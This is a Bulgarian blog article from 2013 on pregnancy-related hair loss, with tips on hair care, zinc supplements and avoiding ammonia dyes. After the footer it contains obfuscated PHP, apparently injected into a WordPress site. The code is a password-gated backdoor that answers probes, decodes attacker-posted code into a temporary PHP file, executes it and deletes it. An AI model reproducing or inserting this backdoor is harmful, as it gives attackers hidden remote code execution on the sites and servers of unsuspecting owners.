Бременността предизвиква косопад – истина или лъжа? | Косопад

Бременността предизвиква косопад – истина или лъжа?

бременностВярно ли е, че при бременност косата много капе? Възможно ли е да го избегнете?

Бременността, освен че ни прави много щастливи, може силно да разтревожи някои жени, особено ако им е за първи път. Стресът, от прекаленото мислене за бъдещето, докато коремът ни расте, може да предизвика или засили косопада.

Не е мит, а реалност по време на деветте месеца след зачеването, която се усилва особено след раждането. Важно е да го знаете , за да не се притеснявате, тъй като това е провокирано от нов хормонален ритъм, но е нормално в нашето състояние. Важното е, че косопадът е временен. Косата ни се стабилизира няколко месеца след раждането.

Предлагаме ви няколко доста ефективни съвета, които ще ви помогнат да бременност1намалите косопада си:

– Не използвайте балсами за коса
– Не третирайте косата си при високи температури
– Не си сушете косата със сешоар

Какво да правим, ако косопадът не спира? Може да приемате витамини и минерали, особено цинк, за да стимулирате космения фоликул. Уверете се, че тази хранителна добавка няма да ви навреди по време на кърменето. Може да се възползвате и от козметични средства като лосион срещу косопад, например.

Избягвайте бои за коси, които съдържат амоняк, по време на бременността и кърменето.

17. ноември 2013 19:18:14 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}